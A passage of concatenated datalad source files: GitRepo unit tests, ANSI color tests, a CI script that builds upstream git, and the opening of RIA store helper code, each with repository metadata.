eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(sorted_=True)],\n [\"s_abc\", \"s_xyz\"])\n\n # Limit by path\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[\"s_abc\"])],\n [\"s_abc\"])\n\n # Pointing to a path within submodule should include it too\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[\"s_abc/unrelated\"])],\n [\"s_abc\"])\n\n # top level should list all submodules\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[repo.path])],\n [\"s_abc\", \"s_xyz\"])\n\n # Limit by non-existing/non-matching path\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[\"s_unknown\"])],\n [])\n\n\n@with_tempfile\ndef test_get_submodules_parent_on_unborn_branch(path=None):\n repo = GitRepo(path, create=True)\n subrepo = GitRepo(op.join(path, \"sub\"), create=True)\n subrepo.commit(msg=\"s\", options=[\"--allow-empty\"])\n repo.save(path=\"sub\")\n eq_([s[\"gitmodule_name\"] for s in repo.get_submodules_()],\n [\"sub\"])\n\n\ndef test_to_options():\n\n class Some(object):\n\n def cmd_func(self, git_options=None, annex_options=None, options=None):\n\n git_options = git_options[:] if git_options else []\n annex_options = annex_options[:] if annex_options else []\n options = options[:] if options else []\n\n faked_cmd_call = ['git'] + git_options + ['annex'] + \\\n annex_options + ['my_cmd'] + options\n\n return faked_cmd_call\n\n eq_(Some().cmd_func(options=to_options(m=\"bla\", force=True)),\n ['git', 'annex', 'my_cmd', '--force', '-m', 'bla'])\n\n eq_(Some().cmd_func(git_options=to_options(C=\"/some/where\"),\n annex_options=to_options(JSON=True),\n options=to_options(unused=True)),\n ['git', '-C', '/some/where', 'annex', '--JSON', 'my_cmd', '--unused'])\n\n eq_(Some().cmd_func(git_options=to_options(C=\"/some/where\", split_single_char_options=False),\n annex_options=to_options(JSON=True),\n options=to_options(unused=True)),\n ['git', '-C/some/where', 'annex', '--JSON', 'my_cmd', '--unused'])\n\n\ndef test_to_options_from_gitpython():\n \"\"\"Imported from GitPython and modified.\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n eq_([\"-s\"], to_options(**{'s': True}))\n eq_([\"-s\", \"5\"], to_options(**{'s': 5}))\n eq_([], to_options(**{'s': None}))\n\n eq_([\"--max-count\"], to_options(**{'max_count': True}))\n eq_([\"--max-count=5\"], to_options(**{'max_count': 5}))\n eq_([\"--max-count=0\"], 
to_options(**{'max_count': 0}))\n eq_([], to_options(**{'max_count': None}))\n\n # Multiple args are supported by using lists/tuples\n eq_([\"-L\", \"1-3\", \"-L\", \"12-18\"], to_options(**{'L': ('1-3', '12-18')}))\n eq_([\"-C\", \"-C\"], to_options(**{'C': [True, True, None, False]}))\n\n # order is undefined\n res = to_options(**{'s': True, 't': True})\n eq_({'-s', '-t'}, set(res))\n\n\n@with_tempfile\ndef test_GitRepo_count_objects(repo_path=None):\n\n repo = GitRepo(repo_path, create=True)\n # test if dictionary returned\n eq_(isinstance(repo.count_objects, dict), True)\n # test if dictionary contains keys and values we expect\n empty_count = {'count': 0, 'garbage': 0, 'in-pack': 0, 'packs': 0, 'prune-packable': 0,\n 'size': 0, 'size-garbage': 0, 'size-pack': 0}\n eq_(empty_count, repo.count_objects)\n\n\n# this is simply broken on win, but less important\n# https://github.com/datalad/datalad/issues/3639\n@skip_if_on_windows\n@with_tempfile\ndef test_optimized_cloning(path=None):\n # make test repo with one file and one commit\n originpath = op.join(path, 'origin')\n repo = GitRepo(originpath, create=True)\n with open(op.join(originpath, 'test'), 'w') as f:\n f.write('some')\n repo.add('test')\n repo.commit('init')\n assert_repo_status(originpath, annex=False)\n from glob import glob\n\n def _get_inodes(repo):\n return dict(\n [(os.path.join(*o.split(os.sep)[-2:]),\n os.stat(o).st_ino)\n for o in glob(os.path.join(repo.path,\n repo.get_git_dir(repo),\n 'objects', '*', '*'))])\n\n origin_inodes = _get_inodes(repo)\n # now clone it in different ways and see what happens to the object storage\n from datalad.support.network import get_local_file_url\n clonepath = op.join(path, 'clone')\n for src in (originpath, get_local_file_url(originpath, compatibility='git')):\n clone = GitRepo.clone(url=src, path=clonepath, create=True)\n clone_inodes = _get_inodes(clone)\n eq_(origin_inodes, clone_inodes, msg='with src={}'.format(src))\n rmtree(clonepath)\n# del clone\n# gc.collect()\n # Note: del needed, since otherwise WeakSingletonRepo would just\n # return the original object in second run\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_GitRepo_flyweight(path1=None, path2=None):\n\n import gc\n\n repo1 = GitRepo(path1, create=True)\n assert_is_instance(repo1, GitRepo)\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. 
Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # As long as we don't reintroduce any circular references or produce\n # garbage during instantiation that isn't picked up immediately, `repo1`\n # should be the only counted reference to this instance.\n # Note, that sys.getrefcount reports its own argument and therefore one\n # reference too much.\n assert_equal(1, sys.getrefcount(repo1) - 1)\n\n # instantiate again:\n repo2 = GitRepo(path1, create=False)\n assert_is_instance(repo2, GitRepo)\n\n # the very same object:\n ok_(repo1 is repo2)\n\n # reference the same in a different way:\n with chpwd(path1):\n repo3 = GitRepo(op.relpath(path1, start=path2), create=False)\n\n # it's the same object:\n ok_(repo1 is repo3)\n\n # and realpath attribute is the same, so they are still equal:\n ok_(repo1 == repo3)\n\n orig_id = id(repo1)\n\n # Be sure we have exactly one object in memory:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n # deleting one reference doesn't change anything - we still get the same\n # thing:\n gc.collect() # TODO: see first comment above\n del repo1\n ok_(repo2 is not None)\n ok_(repo2 is repo3)\n ok_(repo2 == repo3)\n\n # re-requesting still delivers the same thing:\n repo1 = GitRepo(path1)\n assert_equal(orig_id, id(repo1))\n\n # killing all references should result in the instance being gc'd and\n # re-request yields a new object:\n del repo1\n del repo2\n\n # Killing last reference will lead to garbage collection which will call\n # GitRepo's finalizer:\n with swallow_logs(new_level=1) as cml:\n del repo3\n gc.collect() # TODO: see first comment above\n cml.assert_logged(msg=\"Finalizer called on: GitRepo(%s)\" % path1,\n level=\"Level 1\",\n regex=False)\n\n # Flyweight is gone:\n assert_not_in(path1, GitRepo._unique_instances.keys())\n # gc doesn't know any instance anymore:\n assert_equal([], [o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1])\n\n # new object is created on re-request:\n repo1 = GitRepo(path1)\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n\n@with_tree(tree={'ignore-sub.me': {'a_file.txt': 'some content'},\n 'ignore.me': 'ignored content',\n 'dontigno.re': 'other content'})\ndef test_GitRepo_gitignore(path=None):\n\n gr = GitRepo(path, create=True)\n sub = GitRepo(op.join(path, 'ignore-sub.me'))\n # we need to commit something, otherwise add_submodule\n # will already refuse the submodule for having no commit\n sub.add('a_file.txt')\n sub.commit()\n\n from ..exceptions import GitIgnoreError\n\n with open(op.join(path, '.gitignore'), \"w\") as f:\n f.write(\"*.me\")\n\n with assert_raises(GitIgnoreError) as cme:\n gr.add('ignore.me')\n eq_(cme.value.paths, ['ignore.me'])\n\n with assert_raises(GitIgnoreError) as cme:\n gr.add(['ignore.me', 'dontigno.re', op.join('ignore-sub.me', 'a_file.txt')])\n eq_(set(cme.value.paths), {'ignore.me', 'ignore-sub.me'})\n\n eq_(gr.get_gitattributes('.')['.'], {}) # nothing is recorded within .gitattributes\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_set_remote_url(path=None):\n\n gr = GitRepo(path, create=True)\n gr.add_remote('some', 'http://example.com/.git')\n eq_(gr.config['remote.some.url'],\n 'http://example.com/.git')\n # change url:\n gr.set_remote_url('some', 'http://believe.it')\n 
eq_(gr.config['remote.some.url'],\n 'http://believe.it')\n\n # set push url:\n gr.set_remote_url('some', 'ssh://whatever.ru', push=True)\n eq_(gr.config['remote.some.pushurl'],\n 'ssh://whatever.ru')\n\n # add remote without url\n url2 = 'http://repo2.example.com/.git'\n gr.add_remote('some-without-url', url2)\n eq_(gr.config['remote.some-without-url.url'], url2)\n # \"remove\" it\n gr.config.unset('remote.some-without-url.url', scope='local')\n with assert_raises(KeyError):\n gr.config['remote.some-without-url.url']\n eq_(set(gr.get_remotes()), {'some', 'some-without-url'})\n eq_(set(gr.get_remotes(with_urls_only=True)), {'some'})\n\n\n@with_tempfile(mkdir=True)\ndef test_gitattributes(path=None):\n gr = GitRepo(path, create=True)\n # starts without any attributes file\n ok_(not op.exists(op.join(gr.path, '.gitattributes')))\n eq_(gr.get_gitattributes('.')['.'], {})\n # bool is a tag or unsets, anything else is key/value\n gr.set_gitattributes([('*', {'tag': True}), ('*', {'sec.key': 'val'})])\n ok_(op.exists(op.join(gr.path, '.gitattributes')))\n eq_(gr.get_gitattributes('.')['.'], {'tag': True, 'sec.key': 'val'})\n # unset by amending the record, but does not remove notion of the\n # tag entirely\n gr.set_gitattributes([('*', {'tag': False})])\n eq_(gr.get_gitattributes('.')['.'], {'tag': False, 'sec.key': 'val'})\n # attributes file is not added or committed, we can ignore such\n # attributes\n eq_(gr.get_gitattributes('.', index_only=True)['.'], {})\n\n # we can send absolute path patterns and write to any file, and\n # the patterns will be translated relative to the target file\n gr.set_gitattributes([\n (op.join(gr.path, 'relative', 'ikethemike/**'), {'bang': True})],\n attrfile=op.join('relative', '.gitattributes'))\n # directory and file get created\n ok_(op.exists(op.join(gr.path, 'relative', '.gitattributes')))\n eq_(gr.get_gitattributes(\n op.join(gr.path, 'relative', 'ikethemike', 'probe')),\n # always comes out relative to the repo root, even if abs goes in\n {op.join('relative', 'ikethemike', 'probe'):\n {'tag': False, 'sec.key': 'val', 'bang': True}})\n if get_encoding_info()['default'] != 'ascii' and not on_windows:\n # do not perform this on obscure systems without anything like UTF\n # it is not relevant whether a path actually exists, and paths\n # with spaces and other funky stuff are just fine\n funky = u'{} {}'.format(\n get_most_obscure_supported_name(),\n get_most_obscure_supported_name())\n gr.set_gitattributes([(funky, {'this': 'that'})])\n eq_(gr.get_gitattributes(funky)[funky], {\n 'this': 'that',\n 'tag': False,\n 'sec.key': 'val',\n })\n\n # mode='w' should replace the entire file:\n gr.set_gitattributes([('**', {'some': 'nonsense'})], mode='w')\n eq_(gr.get_gitattributes('.')['.'], {'some': 'nonsense'})\n # mode='a' appends additional key/value\n gr.set_gitattributes([('*', {'king': 'kong'})], mode='a')\n eq_(gr.get_gitattributes('.')['.'], {'some': 'nonsense', 'king': 'kong'})\n # handle files without trailing newline\n with open(op.join(gr.path, '.gitattributes'), 'r+') as f:\n s = f.read()\n f.seek(0)\n f.write(s.rstrip())\n f.truncate()\n gr.set_gitattributes([('*', {'ding': 'dong'})], mode='a')\n eq_(gr.get_gitattributes('.')['.'],\n {'some': 'nonsense', 'king': 'kong', 'ding': 'dong'})\n\n\n@with_tempfile(mkdir=True)\ndef test_get_hexsha_tag(path=None):\n gr = GitRepo(path, create=True)\n gr.commit(msg=\"msg\", options=[\"--allow-empty\"])\n gr.tag(\"atag\", message=\"atag msg\")\n # get_hexsha() dereferences a tag to a commit.\n 
eq_(gr.get_hexsha(\"atag\"), gr.get_hexsha())\n\n\n@with_tempfile(mkdir=True)\ndef test_get_tags(path=None):\n from unittest.mock import patch\n\n gr = GitRepo(path, create=True)\n eq_(gr.get_tags(), [])\n eq_(gr.describe(), None)\n\n # Explicitly override the committer date because tests may set it to a\n # fixed value, but we want to check that the returned tags are sorted by\n # the date the tag (for annotaged tags) or commit (for lightweight tags)\n # was created.\n with patch.dict(\"os.environ\", {\"GIT_COMMITTER_DATE\":\n \"Thu, 07 Apr 2005 22:13:13 +0200\"}):\n create_tree(gr.path, {'file': \"\"})\n gr.add('file')\n gr.commit(msg=\"msg\")\n eq_(gr.get_tags(), [])\n eq_(gr.describe(), None)\n\n gr.tag(\"nonannotated\")\n tags1 = [{'name': 'nonannotated', 'hexsha': gr.get_hexsha()}]\n eq_(gr.get_tags(), tags1)\n eq_(gr.describe(), None)\n eq_(gr.describe(tags=True), tags1[0]['name'])\n\n first_commit = gr.get_hexsha()\n\n with patch.dict(\"os.environ\", {\"GIT_COMMITTER_DATE\":\n \"Fri, 08 Apr 2005 22:13:13 +0200\"}):\n\n create_tree(gr.path, {'file': \"123\"})\n gr.add('file')\n gr.commit(msg=\"changed\")\n\n with patch.dict(\"os.environ\", {\"GIT_COMMITTER_DATE\":\n \"Fri, 09 Apr 2005 22:13:13 +0200\"}):\n gr.tag(\"annotated\", message=\"annotation\")\n # The annotated tag happened later, so it comes last.\n tags2 = tags1 + [{'name': 'annotated', 'hexsha': gr.get_hexsha()}]\n eq_(gr.get_tags(), tags2)\n eq_(gr.describe(), tags2[1]['name'])\n\n # compare prev commit\n eq_(gr.describe(commitish=first_commit), None)\n eq_(gr.describe(commitish=first_commit, tags=True), tags1[0]['name'])\n\n gr.tag('specific', commit='HEAD~1')\n eq_(gr.get_hexsha('specific'), gr.get_hexsha('HEAD~1'))\n assert_in('specific', gr.get_tags(output='name'))\n\n # retag a different commit\n assert_raises(CommandError, gr.tag, 'specific', commit='HEAD')\n # force it\n gr.tag('specific', commit='HEAD', options=['-f'])\n eq_(gr.get_hexsha('specific'), gr.get_hexsha('HEAD'))\n\n # delete\n gr.call_git(['tag', '-d', 'specific'])\n eq_(gr.get_tags(), tags2)\n # more than one\n gr.tag('one')\n gr.tag('two')\n gr.call_git(['tag', '-d', 'one', 'two'])\n eq_(gr.get_tags(), tags2)\n\n\n@with_tree(tree={'1': \"\"})\ndef test_get_commit_date(path=None):\n gr = GitRepo(path, create=True)\n eq_(gr.get_commit_date(), None)\n\n # Let's make a commit with a custom date\n DATE = \"Wed Mar 14 03:47:30 2018 -0000\"\n DATE_EPOCH = 1520999250\n gr.add('1')\n gr.commit(\"committed\", date=DATE)\n gr = GitRepo(path, create=True)\n date = gr.get_commit_date()\n neq_(date, None)\n eq_(date, DATE_EPOCH)\n\n eq_(date, gr.get_commit_date(DEFAULT_BRANCH))\n # and even if we get into a detached head\n gr.checkout(gr.get_hexsha())\n eq_(gr.get_active_branch(), None)\n eq_(date, gr.get_commit_date(DEFAULT_BRANCH))\n\n\n@with_tree(tree={\"foo\": \"foo content\",\n \"bar\": \"bar content\"})\ndef test_fake_dates(path=None):\n gr = GitRepo(path, create=True, fake_dates=True)\n\n gr.add(\"foo\")\n gr.commit(\"commit foo\")\n\n seconds_initial = gr.config.obtain(\"datalad.fake-dates-start\")\n\n # First commit is incremented by 1 second.\n eq_(seconds_initial + 1, gr.get_commit_date())\n\n # The second commit by 2.\n gr.add(\"bar\")\n gr.commit(\"commit bar\")\n eq_(seconds_initial + 2, gr.get_commit_date())\n\n # If we checkout another branch, its time is still based on the latest\n # timestamp in any local branch.\n gr.checkout(\"other\", options=[\"--orphan\"])\n with open(op.join(path, \"baz\"), \"w\") as ofh:\n ofh.write(\"baz content\")\n 
gr.add(\"baz\")\n gr.commit(\"commit baz\")\n eq_(gr.get_active_branch(), \"other\")\n eq_(seconds_initial + 3, gr.get_commit_date())\n\n\n@slow # 15sec on Yarik's laptop and tripped Travis CI\n@with_tempfile(mkdir=True)\ndef test_duecredit(path=None):\n # Just to check that no obvious side-effects\n run = WitlessRunner(cwd=path).run\n cmd = [\n sys.executable, \"-c\",\n \"from datalad.support.gitrepo import GitRepo; GitRepo(%r, create=True)\" % path\n ]\n\n env = os.environ.copy()\n\n # Test with duecredit not enabled for sure\n env.pop('DUECREDIT_ENABLE', None)\n # Alternative workaround for what to be fixed by\n # https://github.com/datalad/datalad/pull/3215\n # where underlying datalad process might issue a warning since our temp\n # cwd is not matching possibly present PWD env variable\n env.pop('PWD', None)\n\n out = run(cmd, env=env, protocol=StdOutErrCapture)\n outs = ''.join(out.values()) # Let's not depend on where duecredit decides to spit out\n # All quiet\n test_string = 'Data management and distribution platform'\n assert_not_in(test_string, outs)\n\n # and now enable DUECREDIT - output could come to stderr\n env['DUECREDIT_ENABLE'] = '1'\n out = run(cmd, env=env, protocol=StdOutErrCapture)\n outs = ''.join(out.values())\n\n if external_versions['duecredit']:\n assert_in(test_string, outs)\n else:\n assert_not_in(test_string, outs)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_get_revisions(path=None):\n gr = GitRepo(path, create=True)\n\n def commit(msg):\n gr.commit(msg=msg, options=[\"--allow-empty\"])\n\n # We catch the error and return empty if the current branch doesn't have a\n # commit checked out.\n eq_(gr.get_revisions(), [])\n\n # But will raise if on a bad ref name, including an unborn branch.\n with assert_raises(CommandError):\n gr.get_revisions(DEFAULT_BRANCH)\n\n # By default, we query HEAD.\n commit(\"1\")\n eq_(len(gr.get_revisions()), 1)\n\n gr.checkout(\"other\", options=[\"-b\"])\n commit(\"2\")\n\n # We can also query branch by name.\n eq_(len(gr.get_revisions(DEFAULT_BRANCH)), 1)\n eq_(len(gr.get_revisions(\"other\")), 2)\n\n # \"name\" is sugar for [\"name\"].\n eq_(gr.get_revisions(DEFAULT_BRANCH),\n gr.get_revisions([DEFAULT_BRANCH]))\n\n gr.checkout(DEFAULT_BRANCH)\n commit(\"3\")\n eq_(len(gr.get_revisions(DEFAULT_BRANCH)), 2)\n # We can pass multiple revisions...\n eq_(len(gr.get_revisions([DEFAULT_BRANCH, \"other\"])), 3)\n # ... 
or options like --all and --branches\n eq_(gr.get_revisions([DEFAULT_BRANCH, \"other\"]),\n gr.get_revisions(options=[\"--all\"]))\n\n # Ranges are supported.\n eq_(gr.get_revisions(DEFAULT_BRANCH + \"..\"), [])\n\n\n@xfail_buggy_annex_info\n@with_tree({\"foo\": \"foo\",\n \".gitattributes\": \"* annex.largefiles=anything\"})\ndef test_gitrepo_add_to_git_with_annex_v7(path=None):\n from datalad.support.annexrepo import AnnexRepo\n ar = AnnexRepo(path, create=True, version=7)\n gr = GitRepo(path)\n gr.add(\"foo\")\n gr.commit(msg=\"c1\")\n assert_false(ar.is_under_annex(\"foo\"))\n\n\n@with_tree({\"foo\": \"foo\", \"bar\": \"bar\"})\ndef test_gitrepo_call_git_methods(path=None):\n gr = GitRepo(path)\n gr.add([\"foo\", \"bar\"])\n gr.commit(msg=\"foobar\")\n gr.call_git([\"mv\"], files=[\"foo\", \"foo.txt\"])\n ok_(op.exists(op.join(gr.path, 'foo.txt')))\n\n for expect_fail, check in [(False, assert_in),\n (True, assert_not_in)]:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with assert_raises(CommandError):\n gr.call_git([\"mv\"], files=[\"notthere\", \"dest\"],\n expect_fail=expect_fail)\n check(\"fatal: bad source\", cml.out)\n\n eq_(list(gr.call_git_items_([\"ls-files\"], read_only=True)),\n [\"bar\", \"foo.txt\"])\n eq_(list(gr.call_git_items_([\"ls-files\", \"-z\"], sep=\"\\0\", read_only=True)),\n [\"bar\", \"foo.txt\"])\n\n with assert_raises(AssertionError):\n gr.call_git_oneline([\"ls-files\"], read_only=True)\n\n eq_(gr.call_git_oneline([\"ls-files\"], files=[\"bar\"], read_only=True),\n \"bar\")\n\n ok_(gr.call_git_success([\"rev-parse\", \"HEAD^{commit}\"], read_only=True))\n with swallow_logs(new_level=logging.DEBUG) as cml:\n assert_false(gr.call_git_success([\"rev-parse\", \"HEAD^{blob}\"],\n read_only=True))\n assert_not_in(\"expected blob type\", cml.out)\n\n\n@integration\n # http is well tested already\n # 'git' is not longer supported\[email protected](\"proto\", [\"https\"])\n@skip_if_no_network\n@with_tempfile\ndef test_protocols(destdir=None, *, proto):\n # git-annex-standalone build can get git bundle which would fail to\n # download via https, resulting in messages such as\n # fatal: unable to find remote helper for 'https'\n # which happened with git-annex-standalone 7.20191017+git2-g7b13db551-1~ndall+1\n GitRepo.clone('%s://github.com/datalad-tester/testtt' % proto, destdir)\n\n@with_tempfile\ndef test_gitrepo_push_default_first_kludge(path=None):\n path = Path(path)\n repo_a = GitRepo(path / \"a\", bare=True)\n repo_b = GitRepo.clone(repo_a.path, str(path / \"b\"))\n\n (repo_b.pathobj / \"foo\").write_text(\"foo\")\n repo_b.save()\n\n # push() usually pushes all refspecs in one go.\n with swallow_logs(new_level=logging.DEBUG) as cml:\n res_oneshot = repo_b.push(remote=DEFAULT_REMOTE,\n refspec=[DEFAULT_BRANCH + \":b-oneshot\",\n DEFAULT_BRANCH + \":a-oneshot\",\n DEFAULT_BRANCH + \":c-oneshot\"])\n cmds_oneshot = [ln for ln in cml.out.splitlines()\n if \"Run\" in ln and \"push\" in ln and DEFAULT_BRANCH in ln]\n eq_(len(cmds_oneshot), 1)\n assert_in(\":a-oneshot\", cmds_oneshot[0])\n assert_in(\":b-oneshot\", cmds_oneshot[0])\n assert_in(\":c-oneshot\", cmds_oneshot[0])\n eq_(len(res_oneshot), 3)\n\n # But if datalad-push-default-first is set...\n cfg_var = f\"remote.{DEFAULT_REMOTE}.datalad-push-default-first\"\n repo_b.config.set(cfg_var, \"true\", scope=\"local\")\n with swallow_logs(new_level=logging.DEBUG) as cml:\n res_twoshot = repo_b.push(remote=DEFAULT_REMOTE,\n refspec=[DEFAULT_BRANCH + \":b-twoshot\",\n DEFAULT_BRANCH + \":a-twoshot\",\n 
DEFAULT_BRANCH + \":c-twoshot\"])\n cmds_twoshot = [ln for ln in cml.out.splitlines()\n if \"Run\" in ln and \"push\" in ln and DEFAULT_BRANCH in ln]\n # ... there are instead two git-push calls.\n eq_(len(cmds_twoshot), 2)\n # The first is for the first item of the refspec.\n assert_in(\":b-twoshot\", cmds_twoshot[0])\n assert_not_in(\":b-twoshot\", cmds_twoshot[1])\n # The remaining items are in the second call.\n assert_in(\":a-twoshot\", cmds_twoshot[1])\n assert_in(\":c-twoshot\", cmds_twoshot[1])\n assert_not_in(\":c-twoshot\", cmds_twoshot[0])\n assert_not_in(\":a-twoshot\", cmds_twoshot[0])\n # The result returned by push() has the same number of records, though.\n eq_(len(res_twoshot), 3)\n # The configuration variable is removed afterward.\n assert_false(repo_b.config.get(cfg_var))\n" }, { "alpha_fraction": 0.5805829763412476, "alphanum_fraction": 0.5981690883636475, "avg_line_length": 41.35714340209961, "blob_id": "55fb1815eb510bf380479f79efdd8cd66ae843fa", "content_id": "8ff4e1fd64da9a327932e8d8cd221fcf3b6e8b4c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4151, "license_type": "permissive", "max_line_length": 97, "num_lines": 98, "path": "/datalad/support/tests/test_ansi_colors.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test ANSI color tools \"\"\"\n\nimport os\nfrom unittest.mock import patch\n\nfrom datalad.support import ansi_colors as colors\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n patch_config,\n)\n\n\ndef test_color_enabled():\n # In the absence of NO_COLOR, follow ui.color, or ui.is_interactive if 'auto'\n with patch.dict(os.environ), \\\n patch('datalad.support.ansi_colors.ui'):\n os.environ.pop('NO_COLOR', None)\n for is_interactive in (True, False):\n colors.ui.is_interactive = is_interactive\n with patch_config({'datalad.ui.color': 'off'}):\n assert_equal(colors.color_enabled(), False)\n with patch_config({'datalad.ui.color': 'on'}):\n assert_equal(colors.color_enabled(), True)\n with patch_config({'datalad.ui.color': 'auto'}):\n assert_equal(colors.color_enabled(), is_interactive)\n\n # In the presence of NO_COLOR, default to disable, unless ui.color is \"on\"\n # The value of NO_COLOR should have no effect, so try true-ish and false-ish values\n for NO_COLOR in (\"\", \"1\", \"0\"):\n with patch.dict(os.environ, {'NO_COLOR': NO_COLOR}), \\\n patch('datalad.support.ansi_colors.ui'):\n for is_interactive in (True, False):\n colors.ui.is_interactive = is_interactive\n with patch_config({'datalad.ui.color': 'on'}):\n assert_equal(colors.color_enabled(), True)\n for ui_color in ('off', 'auto'):\n with patch_config({'datalad.ui.color': ui_color}):\n assert_equal(colors.color_enabled(), False)\n\n#\n# In all other tests, just patch color_enabled\n#\n\n\ndef test_format_msg():\n fmt = r'a$BOLDb$RESETc$BOLDd$RESETe'\n for enabled in (True, False):\n with patch('datalad.support.ansi_colors.color_enabled', lambda: enabled):\n assert_equal(colors.format_msg(fmt), 'abcde')\n assert_equal(colors.format_msg(fmt, use_color=False), 'abcde')\n\n with 
patch('datalad.support.ansi_colors.color_enabled', lambda: False):\n for use_color in (True, False):\n assert_equal(colors.format_msg(fmt), 'abcde')\n assert_equal(colors.format_msg(fmt, use_color=use_color), 'abcde')\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: True):\n assert_equal(colors.format_msg(fmt, use_color=True), 'a\\033[1mb\\033[0mc\\033[1md\\033[0me')\n\n\ndef test_color_word():\n s = 'word'\n green_s = '\\033[1;32mword\\033[0m'\n for enabled in (True, False):\n with patch('datalad.support.ansi_colors.color_enabled', lambda: enabled):\n assert_equal(colors.color_word(s, colors.GREEN, force=True), green_s)\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: True):\n assert_equal(colors.color_word(s, colors.GREEN), green_s)\n assert_equal(colors.color_word(s, colors.GREEN, force=False), green_s)\n\n with patch('datalad.support.ansi_colors.color_enabled', lambda: False):\n assert_equal(colors.color_word(s, colors.GREEN), s)\n assert_equal(colors.color_word(s, colors.GREEN, force=False), s)\n\n\ndef test_color_status():\n # status -> (plain, colored)\n statuses = {\n 'ok': ('ok', '\\033[1;32mok\\033[0m'),\n 'notneeded': ('notneeded', '\\033[1;32mnotneeded\\033[0m'),\n 'impossible': ('impossible', '\\033[1;33mimpossible\\033[0m'),\n 'error': ('error', '\\033[1;31merror\\033[0m'),\n 'invalid': ('invalid', 'invalid'),\n }\n\n for enabled in (True, False):\n with patch('datalad.support.ansi_colors.color_enabled', lambda: enabled):\n for status, retopts in statuses.items():\n assert_equal(colors.color_status(status), retopts[enabled])\n" }, { "alpha_fraction": 0.6636363863945007, "alphanum_fraction": 0.668181836605072, "avg_line_length": 19, "blob_id": "43a15af485f572f0d4f47d4c27213a4161bf5025", "content_id": "e61f137107d4fb58b8200f5b378faae5eeb3a5a5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 220, "license_type": "permissive", "max_line_length": 50, "num_lines": 11, "path": "/tools/ci/install-upstream-git.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ntarget_dir=\"$PWD/git-src\"\ngit clone https://github.com/git/git \"$target_dir\"\n(\n cd \"$target_dir\"\n git checkout origin/master\n make --jobs 2\n)\nexport PATH=\"$target_dir/bin-wrappers/:$PATH\"\ngit version\n" }, { "alpha_fraction": 0.6046624183654785, "alphanum_fraction": 0.6064742207527161, "avg_line_length": 33.0699577331543, "blob_id": "665b191c17277c643e83652c2eb62f25d9f32c58", "content_id": "d009ea4737f094b25fb6b57ea470de51cbc48051", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8281, "license_type": "permissive", "max_line_length": 87, "num_lines": 243, "path": "/datalad/customremotes/ria_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper for RIA stores\n\n\"\"\"\nimport logging\nfrom pathlib import Path\n\n\nlgr = logging.getLogger('datalad.customremotes.ria_utils')\n\n\nclass UnknownLayoutVersion(Exception):\n pass\n\n\n# TODO: Make versions a tuple of 
(label, description)?\n# Object tree versions we introduced so far. This is about the layout within a\n# dataset in a RIA store\nknown_versions_objt = ['1', '2']\n# Dataset tree versions we introduced so far. This is about the layout of\n# datasets in a RIA store\nknown_versions_dst = ['1']\n\n\n# TODO: This is wrong and should consider both versions (store+dataset)\ndef get_layout_locations(version, base_path, dsid):\n \"\"\"Return dataset-related path in a RIA store\n\n Parameters\n ----------\n version : int\n Layout version of the store.\n base_path : Path\n Base path of the store.\n dsid : str\n Dataset ID\n\n Returns\n -------\n Path, Path, Path\n The location of the bare dataset repository in the store,\n the directory with archive files for the dataset, and the\n annex object directory are return in that order.\n \"\"\"\n if version == 1:\n dsgit_dir = base_path / dsid[:3] / dsid[3:]\n archive_dir = dsgit_dir / 'archives'\n dsobj_dir = dsgit_dir / 'annex' / 'objects'\n return dsgit_dir, archive_dir, dsobj_dir\n else:\n raise ValueError(\"Unknown layout version: {}. Supported: {}\"\n \"\".format(version, known_versions_dst))\n\n\ndef verify_ria_url(url, cfg):\n \"\"\"Verify and decode ria url\n\n Expects a ria-URL pointing to a RIA store, applies rewrites and tries to\n decode potential host and base path for the store from it. Additionally\n raises if `url` is considered invalid.\n\n ria+ssh://somehost:/path/to/store\n 